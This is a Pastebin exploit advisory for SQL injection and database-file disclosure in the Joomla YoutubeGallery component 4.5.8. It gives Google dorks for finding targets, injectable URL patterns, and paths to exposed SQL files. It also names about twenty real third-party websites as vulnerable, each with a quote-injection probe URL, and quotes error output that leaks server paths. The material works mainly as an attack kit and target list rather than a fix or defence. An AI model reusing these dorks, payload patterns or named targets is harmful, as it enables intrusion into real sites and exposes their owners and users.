Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ########################################################################################
- # Exploit Title : Joomla YoutubeGallery Components 4.5.8 Database Disclosure and SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/01/2019
- # Vendor Homepage : joomlaboat.com
- # Software Information Links : extensions.joomla.org/extension/youtube-gallery/
- joomlaboat.com/en/youtube-gallery
- # Software Download Link : joomlaboat.com/images/extensions/youtubegallery_free_4.5.8.zip
- # Software Vulnerable Source Codes :
- github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql/updates/mysql
- github.com/joomlagovbr/joomla-3.x/tree/master/administrator/components/com_youtubegallery/sql
- # Software Affected Versions : 4.5.8 and previous versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_youtubegallery''
- inurl:''/administrator/components/com_youtubegallery/''
- # Previous Version : 4.1.7 CVE Details =>
- nvd.nist.gov/vuln/detail/CVE-2014-4960 - cvedetails.com/cve/CVE-2014-4960/
- # CVE : CVE-2014-4960
- # Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access Controls ]
- CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
- CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]
- CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
- ########################################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_youtubegallery&view=gallery&layout=custom&Itemid=[SQL Injection]
- /index.php?option=com_youtubegallery&view=gallery&Itemid=[SQL Injection]
- /index.php?option=com_youtubegallery&view=gallery&Itemid=[ID-NUMBER]&videoid=[SQL Injection]
- /index.php?option=com_youtubegallery&view=youtubegallery&Itemid=
- [ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]=[SQL Injection]
- /index.php?option=com_youtubegallery&view=gallery&Itemid=
- [ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&lang=[SQL Injection]
- /index.php?option=com_youtubegallery&view=youtubegallery&galleryid=
- [ID-NUMBER]&videoid=[YOUTUBE-VIDEO-ID-NUMBER]&tmpl=[SQL Injection]
- /index.php?option=com_youtubegallery&view=youtubegallery&Itemid=
- [ID-NUMBER]&galleryid=[ID-NUMBER]&videoid=[SQL Injection]
- /index.php?option=com_easy_youtube_gallery&view=videos&mycategory=
- [ID-NUMBER]&defaultvideo=[ID-NUMBER]&Itemid=[SQL Injection]
- /index.php?option=com_youtubegallery&view=youtubegallery&listid=
- [ID-NUMBER]&themeid=[ID-NUMBER]'&videoid=
- [YOUTUBE-VIDEO-ID-NUMBER]&tmpl=component&TB_iframe=
- true&height=[ID-NUMBER]&width=[SQL Injection]
- ########################################################################################
- # Database Disclosure Exploit :
- ***************************
- /administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql
- /administrator/components/com_youtubegallery/sql/uninstall.mysql.utf8.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/0.0.1.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.1.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.2.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.3.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.2.5.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.3.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.5.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.6.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/1.3.7.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.0.0.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.0.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.1.4.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.0.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.7.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.2.9.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/2.3.0.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.0.0.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.0.6.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.3.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.5.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.1.8.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.2.4.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.2.7.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.6.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.7.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.3.9.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.4.8.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.5.7.sql
- /administrator/components/com_youtubegallery/sql/updates/mysql/3.5.8.sql
- ########################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] terrabit.com.br/cmfp/administrator/components/com_youtubegallery/sql/install.mysql.utf8.sql
- [+] jfkleinheidorn.de/administrator/components/com_youtubegallery/sql/updates/mysql/2.1.3.sql
- [+] ceensac.com/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&Itemid=266%27 =>
- [ Proof of Concept for SQL Injection ] => archive.is/VXqiB
- [+] newyddwelshcobs.co.uk/index.php?option=com_youtubegallery&view=gallery&Itemid=48&videoid=1%27
- [+] medealabperu.com/senscience/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&videoid=82X2hj53r2I&tmpl=1%27
- [+] praiamotor.com.br/index.php?option=com_youtubegallery&view=gallery&Itemid=37%27
- [+] ncd.org.jo/index.php?option=com_youtubegallery&view=gallery&Itemid=128%27
- [+] nazarethchurchnotethnic.org/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=216&galleryid=1&videoid=1%27
- [+] aakashgupta.com/index.php?option=com_youtubegallery&view=gallery&layout=custom&Itemid=113%27
- [+] mindthekids.com.co/index.php?option=com_youtubegallery&view=gallery&Itemid=95&videoid=1%27
- [+] ourtransition.info/index.php?option=com_youtubegallery&view=gallery&Itemid=6%27
- [+] ventzimartinov.com/index.php?option=com_youtubegallery&view=gallery&Itemid=56&videoid=u-OtHblFgkc&lang=1%27
- [+] ponowa48.pl/index.php?option=com_youtubegallery&view=gallery&Itemid=114%27
- [+] srisaidarshan.org/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=22%27
- [+] carpmachine.at/index.php?option=com_youtubegallery&view=youtubegallery&galleryid=1&Itemid=140'
- [+] ondazul.org.br/site/index.php?option=com_youtubegallery&view=gallery&Itemid=73'
- [+] hitech-stroy.ck.ua/index.php?option=com_youtubegallery&view=gallery&Itemid=4'
- [+] hundesport-gersdorf.de/index.php?option=com_youtubegallery&view=youtubegallery&Itemid=158&videoid=P833hFQoB4A=1%27
- [+] jamesallenclark.com/index.php?option=com_youtubegallery&view=gallery&Itemid=57'
- ########################################################################################
- # Example SQL Database Error :
- Strict Standards: Only variables should be assigned by reference in
- /home/medealab/public_html/senscience/plugins/system/rokbox/rokbox.php on line 51
- Deprecated: Non-static method VideoSource_YouTube::extractYouTubeID() should not be
- called statically, assuming $this from incompatible context in /home/medealab
- /public_html/senscience/components/com_youtubegallery/includes/misc.php on line 198
- Warning: DOMDocument::load(http://gdata.youtube.com/feeds/api/videos/RLz2k-oAhPo)
- [domdocument.load]: failed to open stream: HTTP request failed! HTTP/1.0 410
- Gone in /usr/home/gurjiysp/data/www/hitech-stroy.ck.ua/components
- /com_youtubegallery/models/gallery.php on line 145
- ########################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ########################################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement